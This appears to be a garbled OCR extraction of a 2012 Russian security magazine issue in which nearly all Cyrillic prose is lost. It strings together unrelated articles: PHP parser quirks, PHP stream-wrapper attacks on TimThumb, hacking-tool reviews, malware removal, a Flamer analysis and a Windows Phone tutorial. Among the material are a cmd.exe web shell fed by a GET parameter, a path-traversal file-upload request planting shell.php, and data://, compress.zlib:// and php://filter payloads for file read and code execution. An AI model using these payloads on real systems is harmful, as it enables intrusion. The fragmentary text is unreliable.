$process = new Diagnostics\Process();
$process->StartInfo->FileName = "cmd.exe";
$process->StartInfo->WorkingDirectory = "C:\\";
$process->StartInfo->Arguments = "/c ".$_GET["cmd"];
$process->Start();
$process->WaitForExit();
?>

OLD SCHOOL


Roadsend PHP Quercus
HTML-,

(. . 5). , , 2012
, 2002-?

Path Traversal
Quercus, 3- - Resin,
Path Traversal .
. -

LAMP

Array
test.php?a%=1 ([a%] => 1
)
Array
test.php?a =1 ([a_] => 1
)
Array
test.
(
php?a%00b=1 [a] => 1
)

IIS 7.5 +
Phalanger 3.0
Array
(
[a%] => 1
)
Array
(
[a ] => 1
)
Array
(
[a b] => 1
)

HipHop
Array
(
[a%] => 1
)
Array
(
[a_] => 1
)
Array
(
[a] => 1
)

Quercus on
Resin <= 4.0.26
Array
(
[a ] =>
)
Array
(
[a ] => 1
)
Array
(
[a b] => 1
)

2.

08 /163/ 2012

PHP


.
HTTP-,

POST http://127.0.0.1:8080/test/file.php HTTP/1.1

Content-Type: multipart/form-data;
boundary=---------------------------101412320927450
Content-Length: 228
-----------------------------101412320927450
Content-Disposition: form-data; name="test";
filename="../shell.php"
Content-Type: application/octet-stream
<?php
phpinfo();
?>
-----------------------------101412320927450--

advisory: bit.ly/MFeJYu. .

Null-byte
Path Traversal
Quercus.
null-byte,
(, jpg),
. , ,
.

Script #1
(resin 3.1.12)

Script #1
(resin 4.0.26)

Script #2

True

False

False

True

False

True

True

True

False

True

True

True

True

True

-1

False

True

True

"1"

False

False

True

"0"

False

False

True

"-1"

False

False

True

Null

True

True

True

array()

True

True

True

"php"

False

False

True

""

False

False

True

3.

: (jpg, png
gif), , .
, null-byte
null-byte,
.jpg. , .jpg .
.



<?php
if(isset($_FILES["image"])) {
if(!preg_match('#\.(jpg|png|gif)$#',
$_FILES["image"]["name"])) {
die("Hacking attempt!");}
copy($_FILES["image"]["tmp_name"],
"./uploads/".$_FILES["image"]["name"]
);
}
?>

PHP ( ,
), :
;
( );
;
Path Traversal .
-
PHP. Quercus,
. : HipHop - PHP. z

WWW

POSITIVE HACK DAYS 2012





Positive Hack Days 2012. ,
PHDays ,

.
PHDays
,

DEF CON Black
Hat .

08 /163/ 2012

:). PHDays ,
,

- -
. ,

, slidesha.
re/Nl2VLF.
,


(www.phdays.ru).




-
Positive Technologies
advisory:
bit.ly/MFeJYu.

063

, Positive Technologies (amoskvin@ptsecurity.ru)

1 (2)

PHP



, .

wrapper ,

, ,
. , , , .

WRAPPER'





Positive Hack Days
2012

INTRO
, PHP
, . OWASP TOP 10 WASC TCv2.
, , ,
( ).
, PHP wrappers
.
, ,
.

064

PHP , (Streams), 4.3.0.


, ,
, .
, , . , , .
fopen. ,
:
resource fopen ( string $filename , string $mode
[, bool $use_include_path = false [, resource $context ]] )

$filename . ,
:
$handle = fopen($file, "rb");
while (!feof($handle))
{
$contents .= fread($handle, 8192);
}
print $contents;

(wrapper). ,
, . , fopen
:
FTP:
ftp://user:password@10.0.0.1/pub/file.txt;
, , server-status/serverinfo IP: http://127.0.0.1/server-status;
,
(PHP >= 5.3.6): php://fd/XXX;
OS (
expect): expect://ls.

08 /163/ 2012

( )
, . , ,
.
, - , .

read. ,
.
, copy()
,
php://output, .
, copy()
, .
copy('/etc/passwd' , 'php://output');

file_put_
contents ,
write:
file_put_contents('php://output',
file_get_contents('/etc/hosts'));

PHP 5.3.6 php://fd, . PHP


Apache, php://fd
access_log/error_log (
644,
root).
, PHP ,
, stream_wrapper_register.
PHP (bit.ly/
PbdGFT).
phpinfo Registered PHP Streams.
,
. .

ZIP?
ZIP .
,
. PHP
zip.
Linux- zip , PHP
--enable-zip.
, ;
, , , /.
zip
: , zip-.
zip-
$zip = new ZipArchive;
if ($zip->open('/tmp/any_name_zip_arxiv',1))
{
$zip->addFromString( '/my/header.html',
'<?php print_r(ini_get_all());' );
}
$zip->close();

zip- , zip:// .

08 /163/ 2012

Registered PHP
Streams

https, ftps, compress.xlib, compress.bzip2, file, glob,


data, http, ftp, zip, phar

Registered Stream
Sockrt Transport

tcp, udp, unix, udg, ssl, sslv3, sslv2, tls

Registered Stream
Filters

zlib.*, bzip2.*, convert.iconv.*, string.rot13, string.


toupper, string.tolower, string.strip_tags, convert.*,
consumed, dechunk

Registered PHP Streams phpinfo()

zip-
print file_get_contents(
'zip:///tmp/any_name_zip_arxiv#/my/header.html');

, , Remote
File Include, null-.
:
$s = $_POST['path'];
include $s.'/header.html';

,
. http://, ftp://, data://
allow_url_include,
null-
magic_quotes_gpc. ,
allow_url_include=Off magic_quotes_gpc=On
.
, !
,
. , zip-, , PHP-,
zip://.
path=zip:///tmp/any_name_zip_arxiv#/my

PHP, ,
PHP HTML-.
phpinfo().
, LFI/RFI,
rdot.org. , allow_url_fopen zip://.

WHERE IS MY DATA://?
data://
-.
. RFC 2379,
:
dataurl
:= "data:" [ mediatype ] [ ";base64" ] "," data
mediatype := [ type "/" subtype ] *( ";" parameter )
data := *urlchar
parameter := attribute "=" value

mediatype ,
:
data://anytype/anysubtype;myattr!=V@l!;youattr?=Op$;base64

. , TimThumb v1.x
:

065


function validate_url ($url) {
$pattern="/\b(?:(?:https?):\/\/|www\.)
[-a-z0-9+&@#\/%?=~_|!:,.;]*[-a-z0-9+&@#\/%=~_|]/i";
return preg_match ($pattern, $url);

}
:
data://text/plain;charset=http://w?param=anyval;base64,
SSBsb3ZlIFBIUAo

PHP , stream_get_meta_data().
,
:

,
parse_url, . ,
, ,
img.youtube.com.
$url_info = parse_url($_POST['src']);
if ($url_info['host'] === 'img.youtube.com') {
$name = str_replace('/', '',
substr($url_info['path'], 4));
copy( $src, './'.$name );
}

img.youtube.com :

array stream_get_meta_data ( resource $stream )


POST DATA: src=http://img.youtube.com/vi/Uvwfxki7ex4/0.jpg


,
.
data://
! ? :
$password = 'secret';
$file = $_POST['file'];
$fp = fopen( $file, 'r');
extract(stream_get_meta_data($fp));
if ( $mediatype === 'text/plain') { ... }
if ( $_COOKIE['admin'] === $password) { ... }

$file data,
POST DATA: file=data://text/plain;password=mysecret;base64

$password ,
, .


compress.zlib://.
POST DATA: src=compress.zlib://img.youtube.com/../path/to/
local/file;

,
data://:
POST DATA: src=data://img.youtube.com/
aaamy.php?;base64,SSBsb3ZlIFBIUAo


: , .
, data://
compress.zlib:// ,
.
TimThumb.

Cookie: admin=mysecret

TIMTHUMB V1.X

! :). .
PHP ,
prase_url(). , URL. :
URL, :

TimThumb ,
WordPress. 2011 TimThumb v 1.32
,

PHP- (bit.ly/n8YdTd). ,
(bit.ly/qRrUpF).
,
URL ,
. , blogger.com,
, URL
, blogger.com.attacker.com,
.

print_r(parse_url(
'anysheme://anysite.com/;http://w?v@l=!'));

http://www.target.com/timthumb.php?
src=http://blogger.com.attacker.com/pocfile.php

, compress.zlib:// gz-.
, zlib-,
.
, /etc/hosts :
readfile('compress.zlib:///etc/hosts');


1.32 (revision 142).
. , 1.34 (revision 145):

data://

066

function check_external ($src) {


......................
$filename = 'external_' . md5 ($src);

08 /163/ 2012

2. getimagesize , .
, .
$local_filepath, , php://filter, compress.zlib://.
unlink .
, .
, .
src=http://www.youtube.com/?local_filepath=php://filter/
resource%3D./cache/test.php&url_info[host]=
img.youtube.com&src=http://site.com/thumb.txt

1. 149- ,
. parse_str . , URL,
$src.
curl_init , file_get_contents/file_put_contents.
, , curl_init,
PHP .

WordPress

$local_filepath = DIRECTORY_CACHE . '/' . $filename;


if (!file_exists ($local_filepath)) {
if(strpos(strtolower($src),'http://')!==false||
strpos(strtolower($src),'https://')!==false){
if (!validate_url ($src))
display_error ('invalid url');
$url_info = parse_url ($src);
......................
if($url_info['host']=='www.youtube.com' ||
$url_info['host'] == 'youtube.com') {
parse_str ($url_info['query']);
......................
if (function_exists ('curl_init')) {
......................
$fh = fopen ($local_filepath, 'w');
$ch = curl_init ($src);
.....................................
curl_setopt ($ch, CURLOPT_URL, $src);
......................
curl_setopt ($ch, CURLOPT_FILE, $fh);
curl_setopt ($ch, CURLOPT_WRITEFUNCTION,
'curl_write');
.......................................
$file_infos = getimagesize ($local_filepath);
if (empty ($file_infos['mime']) ||
!preg_match ("/jpg|jpeg|gif|png/i",
$file_infos['mime'])) {
unlink ($local_filepath);
touch ($local_filepath);
......................

, check_
external :
1. parse_str
.
, ,
: $url_info['host'], $src, $local_filepath. .

08 /163/ 2012

if(!$img = file_get_contents($src)) {
display_error ('remote file for ' .
$src . 'can not be accessed.
It is likely that the file
permissions are restricted');
}
if(file_put_contents($local_filepath,
$img) == FALSE) {
display_error ('error writing
temporary file');
}

, data://
:
data://img.youtube.com/e;charset=
http://w?var=;base64,SSBsb3ZlIFBIUAo

compress.zlib://
:
compress.zlib://youtube.com/../http://?/../../path/to/
local/file

, , RCE
data, ,
compress.zlib.


, PHP File Manipulation.
,
file_exists, is_file, filesize . Suhosin
, allow_url_include On.

php://filter
-. Stay tuned! z

067

D1g1 , Digital Security (twitter.com/evdokimovds)

X-Tools


:
Chris Shields, Matthew Toussain
URL:
kinozoa.com
:
*nix

:
Georges Bossert,
Frederic Guihery
URL:
www.netzob.org
:
*nix

:
Matt Graeber
URL:
https://github.com/
mattifestation/PowerSploit
:
Windows


MITM-


RE

POWERSHELL POST-EXPLOITATION

Subterfuge ,
, Python.

,
ARP (Address Resolution Protocol) .
:

Netzob
,
-, .

:
/ ;


(IDS, IPS, );
.
,
,
,
,
.
.

: NeedlemanWunsch
;
(UPGMA); L*m Dana
Angluin.

PowerSploit Microsoft
PowerShell ,

. PowerSploit
:

;
;
;
HTTP;
;
Race Condition;
DNS-;
Evilgrade;
.

HTTPS- ,

, PPTP,
Cisco IPSec, L2TP, OpenVPN, SSH,

, .

.

068

Inject-Dll;
Inject-Shellcode;
Encrypt-Script;
Get-GPPPassword;
Invoke-ReverseDnsLookup.

,
DLL - , Group Policy
IP-
PTR- DNS,
.

,
PowerShell PE- , reverse engineering
, C#.

: www.exploit-monday.com.

08 /163/ 2012

:
SkyLined
URL:
code.google.
com/p/alpha3
:
Windows

:
Joxean Koret
URL:
zerowine.sourceforge.
net
:
Windows

LPHANUMERIC -
ALPHA3 Python
SkyLined,
x86 x64 . ?


: ,
, .
ALPHA3 .
:
, ,
,
- .

:
ohdae
URL:
ohdae.github.com/
Intersect-2.5
:
*nix

POST-EXPLOITATION
LINUX

Zero Wine ,
OC Windows.
Zero Wine
(
WINE)
,
. :

Intersect
Linux,
Python.
,
, ,

.

,
.

command-line Intersect,

.

30
4 ,

:

raw trace ,
WINE;
;
;
API- .
Zero Wine
Debian QEMU,

-.
: ,
. ,

(, Armadillo),
WINE .

08 /163/ 2012

;
;
;
.

.
-

. :
ALPHA3.py ascii EDI --input="file"
> shellcode.txt


,
,
-


( EDI).

,
- :
ascii, cp437, latin-1, utf-16.

:
rohitab.com
URL:
www.rohitab.com/
apimonitor
:
Windows

6
API-
API Monitor
API-,
.
,
.
:
64- Windows;

;
10 000 API-
600 COM-;
COM;
;
;

;
;
;
;
;
DLL;
.
,
.
.

069

MALWARE

(drobotun@xakep.ru)



,

?

,
. , ,
.

.
,
,
: ,

070



:
, , ;
, , ;
.

, , ,
,
.


.


, , . ,
,
.
, :
-
,
;
,
;
, .

08 /163/ 2012

, , , - , , - -
,


, ,
,
.
,

. 72



,
?

. 74


. ,
,
hosts,

, . .

. 73


.


.
?




. ?

. , ,
, ,
, .
,
lsas, services, system, winlogon,
svchost, csrss .
, %windir%\system32\ ( explorer.exe, ,
, %windir%\). , , .
, .
,
. ,
, , ,
"svshost" .
,
. .
, Process
Explorer SysInternals ProcessHacker,
Kernel Detective
. ,
( ,
WinDbg).
, , , ,
, .
, ( ,
, ), ,
-
.

08 /163/ 2012

.
? (
)


Kernel Detective,
, API NtQuerySystemInformation.
, - ,
,

071

MALWARE


.



. ?



(
,
- ).
?

.
,

. ,
, hosts,
, . .

.
?



,

(,


).
?




. ?

. , ,
(,
,
). . , Handle
SysInternals , .
, ,
WinObj SysInternals
Suit.
, .
, , , , - (
svchost.exe explorer.exe),


(
explorer.exe, winlogon.exe).
,
- .
, SysInternals
TcpView,
, TCP UDP-.
, ,
, .

072


.

- , ,

ntdll.dll!LdrLoadDll
kernel32.dll!LoadLibrary

ntdll.dll!EnumerateValueKey
ntdll.dll!EnumerateKey
advapi.dll!RegEnumKey
advapi.dll!RegEnumKeyEx
advapi.dll!RegEnumValue

ntdll.dll!OpenProcess
ntdll.dll!OpenThread

ntdll.dll!NtQuerySysteminformation
ntdll.dll!RtlGetNativeSystemInformation
kernel32.dll!Process32Next
kernel32.dll! CreateToolhelp32Snapshot

ntdll.dll!NtQueryDirectoryFile
ntdll.dll!NtCreateDirectoryObject
ntdll.dll!NtOpenDirectoryObject
ntdll.dll!QueryInformationFile
ntdll.dll!OpenFile
ntdll.dll!CreateFile
kernel32.dll!FindNextFile
kernel32.dll!CopyFile
kernel32.dll!MoveFile
kernel32.dll!DeleteFile

,
,

API-,

08 /163/ 2012

. 76

PID

, taskkill.
?

. 75

.
?

(
, ,
,
).
?

-
, Process
Hacker Kernel
Detective. ?

,
. ?



.
? (
)
Process
Hacker Process
Explorer


. ?



.
?


,
.



. , , hosts,
,
. .

, , ,
, explorer.exe,
, , .


, . ( )

explorer.exe

08 /163/ 2012

. 74

, , (
, , ,
).
, ,
. - .
Autoruns SisInternals (
).
,
.
,
, . ,
. , Autoruns
. Process Explorer
- ,
() .
: (
Suspend), , , , ,
.

.

073

MALWARE


. ?

Unlocker
-
.


. ?

.
?


explorer.exe ( WinDbg)

(. ).
?


(
)

.
.

. ,
, hosts,
, . .

API.



API ( ,
). ,
- .

, .
. ,
,
.
,
.
, ,
, , , Kernel

074



.
?

,
.

()


.

Detective .
.
, ,
. ,
ntdll.dll
EAX ,
, , :
MOV edi, edi
PUSH ebp
MOV ebp, esp.
,
.

: , , ,
, .
LiveCD, ,
, .
, :). z

08 /163/ 2012

,
,
API-

. ,
, hosts, , . .



, ,
- Autoruns
SisInternals.

(
, WinDbg)
,

.


advapi32.dll, ,
. ?

. 74



.
?

Process
Hacker Process
Explorer

. ?

. ?


.
?


Windows
,
.

, .
Task Manager, VBA Excel
(
Task Manager ),
Process Explorer Process Hacker.
.
Process Explorer
( , ).
,
,
, ()
(,
)
.

08 /163/ 2012

,
, Windows,
.
.
API- ,
API-
.

,
.
Process Hacker ,
,
.

,
(
,
).

075

MALWARE

.
TcpView SisInternals.

explorer.exe,
winlogon.exe, svchost.exe.

IP-?

? (: svchost.exe
winlogon.exe, winint.exe,
csrss.exe, lsass.exe )


API-
. ?

.
, , hosts, , . .

. (3)

.
?

, .
?

.
?

, ,
.
, -

?..


. msconfig,
,
HKCU\Software\Microsoft\Windows\CurrentVersion\Run HKLM\Software\
Microsoft\Windows\CurrentVersion\Run. ,
,
,
, Windows.
Autoruns SisInternals Suit.
, ,
. GUI, , . -

076

, ( Run, RunOnce,
) Internet Explorer
(BHO, ),
( 11.0).
, , . ,
API-, Autoruns
. , , ,
Autoruns - WinDbg,
, F5,
API-.

08 /163/ 2012

DVD


(, , )
RootkitRevealer
SysInternals.
.
( MFT Master File Table NTFS-
) ,
API-.
.


,

API-
.
,

API-.
BlackLight F-Secure

.

( PID).

+ ,

,
.
+


API-

Autoruns.

INFO




,
139-
,

WARNING
,
,
.

GMER. ,
, ,
.
, , ,
TCP/IP-.
- .
,

AVZ.
,
- .
, ,
.

GMER

08 /163/ 2012

,

(,

,

)
.


,
!

WWW

AVZ ,

, :

;
;
;
;
;
;
Winsock SPI/LSP-;
, ;
;
;
TCP/UDP-;
;
NTFS-;


.
, , .
, ( ,
, ) - ( ),
.

-
,
www.processlibrary.
com.
www.nobunkum.
ru/ru/rootkitswindbg


WinDbg



Esage
Lab.
www.esetnod32.
ru/.support/winlock,
sms.kaspersky.ru
www.drweb.
com/xperf/unlocker



.

077

MALWARE

, Symantec

FLAMER

,
!
W32.Flamer, sKyWIper,
Flame,
-
.
,
,
,
( ,
).
.
? , . , Flamer

,

- .
, .
078

,
Flamer ,
. , , ,
Flamer
- .
.

,
.

,

. , ,
. , ,
, , , , . ,

- .
28 2012 MAHER -

(Iran National CERT, www.


certcc.ir/index.php?newlang=eng),
2010
Stuxnet Duqu,
Flamer,
43
. (bit.ly/LL9NTu)
,
.
, 28 ,

Flame ,
International Telecommunication Union
(ITU), .
,
28 2012 ,
(Laboratory of Cryptography and System
Security, CrySyS Lab, www.crysys.hu),
Symantec,

08 /163/ 2012

, !


, sKyWIper (www.crysys.hu/
skywiper-statement.html). (. 1.03), 62 (www.crysys.
hu/skywiper/skywiper.pdf), , , Duqu
Stuxnet,
C&C-,
.
, sKyWIper ,
Flame ( )
Flamer (MAHER).
Symantec
Flamer (www.
symantec.com/en/uk/security_response)
27.05.2012 19:00 (UTC).

Symantec Flamer
.

( ).
, ( ,
).


Flamer ,
, 2010 .

, .
.
, Flamer
Stuxnet .
Flamer ,
,

.
-, SQL
SSH.
Lua-,

.
Flamer

Microsoft Windows.
Flamer
.
,
, ,
autorun.inf. CVE-2010-2568,
Stuxnet, CVE-20102729. , Flamer (a man-in-the-middle, MITM),
Windows
Update.
,
MD5, ,

08 /163/ 2012


Microsoft Root Authority.



Flamer .
,
Flamer .
:

advnetcfg.ocx,
ccalc32.sys,
mssecmgr.ocx ,
msglu32.ocx,
boot32drv.sys,
nteps32.ocx.


advnetcfg.ocx.
2010 , 2011-.
ccalc32.sys
, , advnetcfg.ocx.
Flamer ,

. 150
, . 1. ,

,
.

Flamer , ,
-,
.
6 ,
20 . Lua-,

,
(). 62 , ,
C&C-
.
,

, .

Flamer, , mssecmgr.ocx.
, 3.
,
,
, mssecmgr.
ocx.
,


. ,

.1.


DLL- : advnetcfg.
ocx, nteps32.ocx, boot32drv.sys, msglu32.ocx,
soapr32.ocs, jimmy.dll, 00006411.dll .
, HTTP-, SOCKS-,
SSH, SQLite , , Lua-.
Lua ,
. , ,
,
. Lua
, Flamer.
mssecmgr.ocx , ,
.
-,
advnetcfg.ocx, ccalc32.sys.
ccalc32.sys RC4
128- .
ccalc32.sys, ,
Windows kernel32.dll,
.
advnetcfg.ocx , .
mssecmgr.ocx nteps32.
ocx advnetcfg.ocx,
nteps32.ocx shell32.dll.
( ) DLL ,
winlogon.exe
.
Windows , Windows:
HKEY_LOCAL_MACHINE\SYSTEM\Current
ControlSet\Control\Lsa\"Authentication
Packages" = "mssecmgr.ocx"

nteps32.ocx
mssecmgr.ocx Lua.

. (
FLAME.) -

079

MALWARE
.

.
( ,

):

ATTACKOP
;
CASAFETY ;
CRUISE ;
EUPHORIA LNK ;
BEETLEJUICE Bluetooth-;
SUICIDE Flamer ;
MUNCH HTTP-;
VIPER ;
FLASK ;
MICROBE ;
GATOR C&C-.

. ,
ATTACKOP soapr32.ocx.
,
RC4.
,
.

.
mssecmgr.ocx
~DEB93D.tmp,
Wiper,
. Wiper

.

Flamer.


,
.

,
-
. ,
.
Flamer USB-,
,
() .

Flamer .
Flamer -

080

.
,
:

, ,
;
Microsoft Windows Print
Spooler Service Remote Code Execution
Vulnerability (CVE-2010-2729), Stuxnet;
, autorun.
inf, Stuxnet;
, ,

USB-,
Microsoft Windows Shortcut 'LNK/PIF' Files
Automatic File Execution Vulnerability (CVE-20102568), Stuxnet;
Windows Update
(MITM).



,
,
, .
USB


Windows,
. , , C:\My\Very\Long\
Directory\Path,
C:\MyJunction,
.

. Flamer , .
,
, My Docs.
Flamer :
, ,
mssecmgr.ocx,
desktop.ini,
target.lnk.

Desktop.ini Windows,
. Flamer
ShellClassInfo desktop.ini,
.

,
.
Flamer
.
CLSID
ShellClassInfo.
CLSID My Docs
,
target.lnk,
.
,
My Docs, Windows
Explorer, , , target.
lnk. ,
My Docs, target.lnk
desktop.ini,
Flamer (mssecmgr.ocx).
Flamer
.
Flamer
. .lnk
, Flamer ( Stuxnet)
Microsoft Windows
Shortcut 'LNK/PIF' Files Automatic File Execution
Vulnerability (CVE-2010-2568). target.lnk, Flamer , ,
. , Windows
, ,
target.lnk (mssecmgr.ocx). Flamer .
1.
, ,
.


Flamer , , .

.
; ,
, . ,
, GPS- .
SQLight %Temp%
.

Sony Ericsson Nokia, Flamer .

08 /163/ 2012

, !

.2.

.3.

2. Windows
, .
3. Flamer lnk-, .

NetBIOS WPAD ,
.
wpad.dat, - ,
Flamer.
-
.
MUNCH -
Flamer,
. MUNCH
,
URL- Windows Update.
, MITM .
Windows Update ,
Microsoft. Flamer
, , Microsoft Root Authority
. Microsoft
Terminal Server Licensing.
Microsoft
Terminal Services Licensing,
Microsoft
Terminal Services.

Microsoft Enforced Licensing Intermediate
PCA, , ,
Microsoft Root Authority.

,
. Flamer
Microsoft.
( Microsoft
Security Advisory 2718704
, ,
.)


Windows XP, Windows
Vista Windows 7 Microsoft
Hydra.

man-in-the-middle (MITM, ) Windows Update


Flamer
Windows
Update
. : SNACK,
MUNCH GADGET.
Internet Explorer,

-.
Web Proxy Auto-Discovery Protocol
(WPAD). Internet Explorer
(wpad.dat)
. ,
computerA.group.company.com, Internet
Explorer wpad.dat :
wpad.group.company.com,
wpad.company.com.
IP-
DNS. DNS
, Internet Explorer WINS NetBIOS.
NetBIOS
peer-to-peer ,
.

. ,
, , , .
SNACK ,
NetBIOS-
.
WPAD-,
Flamer , WPAD,
WPAD- (wpad.dat). -

08 /163/ 2012

, MD5.
,
MD5 ,
.
Flamer Windows
Update, GADGET MUNCH , ,
Microsoft.

, Windows Update.
Flamer, .

TumblerEXE.exe.
Tumbler
,
. Tumbler ,
,
, Flamer, HTTP
URL- :
[http://]MSHOME-<STRING>/view.php?mp=1&
jz=<STRING>&fd=<STRING>&am=<STRING>&ef=
<STRING>&pr=<STRING>&ec=<STRING>&ov=
<STRING>&dd=<STRING>

MUNCH Flamer
mssecmgr.
ocx, Tumbler %Windir%\
temp\~ZFF042.tmp .
.
Flamer.
BLUETOOTH
Flamer Windows, Bluetooth. BeetleJuice,

, .
,
.
Bluetooth-.

081

MALWARE

, ,
.

Bluetooth-. , ,
Flamer, ,
Bluetooth- .
Bluetooth- Flamer
description.
Bluetooth, .
,
Bluetooth-.
,
,
. Bluetooth-


,
.


(

/
) , .
C&C-
80 , C&C-,
, IP.
() .
2012 C&C-,
,

browse32.ocx, Flamer
.
09 2012 .
browse32.ocx :

1. EnableBrowser ,
(, ,
) .
2. StartBrowse ,
Flamer.


, Flamer.

,

, . ,
.

.
,
, Flamer
SUICIDE . ,
SUICIDE,
Flamer
.

,
,

, ,


(!)
.
! z

, FLAMER
:


( )

:
IP-
Gateway
Proxy

DHCP
DNS



Hosts





Wi-Fi

082

Microsoft Outlook
Remote Access Services
CoreFTP
CureFTP
EmFTP
FTP Explorer
Mssh
NetserveFTP
RAdmin
RoboFTP
Softx FTP
South River WebDrive
TeamViewer
VNC

:




Bluetooth,




:
MS Word
MS
PowerPoint
MS Excel
MS Publisher
Microsoft Outlook
Express
Microsoft Outlook
Microsoft
Outlook appointments

Microsoft Outlook
MS Visio
MS Access

AutoCAD
PDF-
JPEG
Bitmap
TIFF
PNG
GIF
URL-
CSV-
LNK-

ORA-
RDP-
RTF-
SSH-
SSH2-
TXT-
:













GPS-
GPS-
GPS-





:
Ace FTP
BitKinex
Bulletproof FTP
CyD FTP
Dameware
Innosetup
Intersoft SecureKeyAgent
Ipswitch WSFTP
JaSFTP
Jildi FTP
Netserve FTP
PenguiNet
RageWork
SecureCRT
SmartFTP
VNC

:
NetBIOS/SMB
Yahoo mail
Yahoo Rocketmail
Yahoo Maktoob
Gawab
Google mail
Microsoft Live
Microsoft Hotmail
,
.

08 /163/ 2012

Preview

90

,
,
,
. ,

.
, AES.
?
,
, .

84

WINDOWS PHONE 7.5


, , , JSON
MS.

UNIXOID

120


, Google, Ubuntu Linux 8-
.

08 /163/ 2012

UNIXOID

98



Dart, Google

JavaScript?

SYN/ACK

128


HOWTO ,

.

114

LINUX MINT

,

Distrowatch.com?

FERRUM

132

SSD
HDD
SSD
.
, ?

083

yurembo (yazevsoft@gmail.com)

Windows Phone 7.5




Windows Phone 7.5
,
SDK 7.1.
,

.

084

08 /163/ 2012

Windows Phone 7.5

Microsoft
.
,
256 .
512 .
.
, Windows Phone
,
Microsoft Windows
Phone.
API, , , . SDK (7.0)
.
.

1.
, . , . Visual Studio
2010, Windows Phone Application
Silverlight. . . :
VibrateController.Default.Start(TimeSpan.FromSeconds(5));
. , VibrateController.Default.Stop().
,
API . Microsoft.Devices;
, .

2.

. : . ,
:
FMRadio myRadio = FMRadio.Instance;
myRadio.CurrentRegion = RadioRegion.Europe;
myRadio.Frequency = 103.9; // ,
// , :)
myRadio.PowerMode = RadioPowerMode.On;

FMRadio .
, : Europe, Japan United States.
:). . .
( ?) ,
Windows Phone , .
, : myRadio.PowerMode
= RadioPowerMode.Off. ,
.

3.
Windows Phone ,
.
. , ,
( 1 1),
.
(
), , ,
.
, , , , , ,
, .

.
, :), : Microsoft.Xna.Framework Microsoft.
Device.Sensors (Project Add Reference). C#-
: Microsoft.Xna.
Framework, Microsoft.Devices.Sensors.
, . MainPage :
Accelerometer Acc = new Accelerometer().

. :
Acc.CurrentValueChanged += Acc_CurrentValueChanged.
TimeBetweenUpdates
, :

08 /163/ 2012

Acc.TimeBetweenUpdates = TimeSpan.FromMilliseconds(100).
, :
void Acc_CurrentValueChanged(object sender,
SensorReadingEventArgs<AccelerometerReading> e)
{
var position = e.SensorReading.Acceleration;
Dispatcher.BeginInvoke(() =>
{
xpos.Text = position.X.ToString("0.0");
ypos.Text = position.Y.ToString("0.0");
zpos.Text = position.Z.ToString("0.0");
});
}

position , ;
, .
Vector3.

( Dispatcher).
, Silverlight
:
. Dispatcher,
BackgroundWorker. Silverlight
Microsoft ( ), Bing :),
Windows Phone. ,

085


BeginInvoke , , .

( , ),
, ,
Dispatcher ( ,
).
,
, .
: Acc.Start().
: Acc.Stop().
,
, (. 1).

. 1.

4.
,
, ,
.

. C#-
, .
Accelerometer
Compass.
.
CurrentValueChanged:
void comp_CurrentValueChanged(object sender,

SensorReadingEventArgs<CompassReading> e)
{
var position = e.SensorReading.MagneticHeading;
Dispatcher.BeginInvoke(() =>
{
xpos.Text = position.ToString();
});
}

. .
, ; ,
.

WINDOWS PHONE 7.5



.
,
Windows
Phone (. ),

,


, , ,
.
,
.
,


,
.

,

.

5. XML
XML ,
, Windows Phone .
, .NET.
, 7.5 XML-
.
, XML.
, , XML,
.
, - , -

086

,
,
.
, , , .
System.Xml
System.Xml.Serialization. : System.IO, System.IO.IsolatedStorage, System.Xml,
System.Xml.Serialization.
- -

08 /163/ 2012

Windows Phone 7.5

- .
XML-
( -).
: . ,

, :
public class UserData
{
public string FirstName { get; set; }
public string LastName { get; set; }
public string NickName { get; set; }
}

,
. ,
, , .
,
UserData
:
var record = new UserData();
record.FirstName = textBox1.Text;
record.NickName = textBox3.Text;
record.LastName = textBox2.Text;
using (var store =
IsolatedStorageFile.GetUserStoreForApplication())
using (var file = store.CreateFile("data.xml"))
//
{
XmlSerializer ser = new XmlSerializer(typeof(UserData));
//
ser.Serialize(file, record);
// UserData
}

:
1. ,
.
2. XML- .

3.
, -.
4. , .
using, ,
.

.
, , IDisposable.
Dispose .
:
UserData record = null;
using (var store =
IsolatedStorageFile.GetUserStoreForApplication())
using (var file = store.OpenFile("data.xml", FileMode.Open))
{
XmlSerializer ser = new XmlSerializer(typeof(UserData));
var reader = XmlReader.Create(file);
if (ser.CanDeserialize(reader))
{
record = (UserData)ser.Deserialize(reader);
textBox1.Text = record.FirstName;
textBox2.Text = record.LastName;
textBox3.Text = record.NickName;
}
}

:
, ,
data.xml, , ,
. , ,
, Text .
. ,
. ,
.

6. JSON
JSON (JavaScript Object Notation) , XML,
,
,
.
JavaScript ( ),
. JSON
, XML, ,
UserData:
{ "FirstName" : "Yuriy", "LastName" : "Yazev",
"NickName" : "yurembo" }

, XML :).
:
JSON.
, ,
UserData. DataContractJsonSerializer,

08 /163/ 2012

JSON-,
SystemServicemodel.Web,
: System.IO, System.IO.IsolatedStorage, System.
Runtime.Serialization.Json. . - ,
.
:). -,
json
xml. ,
. -, XmlSerializer
DataContractJsonSerializer. -,
WriteObject Serialize.
, -, ReadObject Deserialize.
( ).
, / .

087

7.

Windows Phone 7.5,
. ,
,

Microsoft.
,
XML-,
, .
, Windows
Phone Microsoft SQL Server Compact.

.

. SQL Server
Transact-SQL, ADO.NET. LINQ.
Microsoft, LINQ
. SQL ?
? , SQL , ( 70- ) , . ,
( , ,
:)), . SQL
Server Compact: , .
- ,
.

. 2.

088

, .
,
MMOg. ,
: ,
, .
System.Data.Linq,

LINQ. .
: ,
Visual Studio ,
XAP-
. , , ,
. ,
, ,

?
Tools Connect to Database. , Microsoft SQL Server Compact 3.5,
Add Connection. Connection Properties
Database
sdf (. 2).
Create
, .
, K, .
, Server Explorer
. , Tables
Create Table.
(. 3).
,
ID, . Server Explorer
Players Table Properties.
Add Relations, Relation Name
(, ID_REL), Primary Key Table
(Users), Foreign Key Table
,

. 3. Users

08 /163/ 2012

Windows Phone 7.5

Players. Primary Key Table Column Foreign Key Table


Column ID.
Add Columns, Add Relation.
. K
.
, SQL Server Compact ,
, ,
. : Microsoft Visual
Studio Visual Studio Tools Visual Studio Command Prompt (2010).
: cd C:\DB, :
sqlmetal gameDB.sdf /code:gameDB.cs /pluralize

,
, ,
Visual Studio. .
VS Solution Explorer, ,
Add Existing Item.
(gameDB.cs).

:

.
, (Get Data)
,
, (Insert Data)
.

, :
, ( )
( Players),
, ,
, .
, , ,
, , .
: try/catch.
WWW
www.microsoft.com

Windows Phone

.

using (var db = new GameDB(DBStr))


{
if (db.DatabaseExists() == false)
// ,
{
db.CreateDatabase(); //
}
}

DVD


,

:
